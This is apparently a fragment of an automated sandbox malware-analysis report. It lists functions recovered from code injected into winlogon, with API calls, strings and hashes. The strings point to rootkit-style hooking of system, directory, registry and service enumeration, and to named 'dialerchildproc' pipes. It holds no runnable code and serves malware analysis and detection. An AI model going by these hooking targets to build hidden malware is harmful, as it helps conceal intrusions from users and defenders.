                                                                          • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700

                                                                          APIs
                                                                            • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                            • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                          • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                          • SleepEx.KERNEL32 ref: 000001E858981ADD
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 1e8589b273c (APIs on its paths: VirtualAlloc)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                          • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
                                                                          • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001E85898CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001E85898CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
                                                                            • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
                                                                            • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
                                                                            • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          APIs
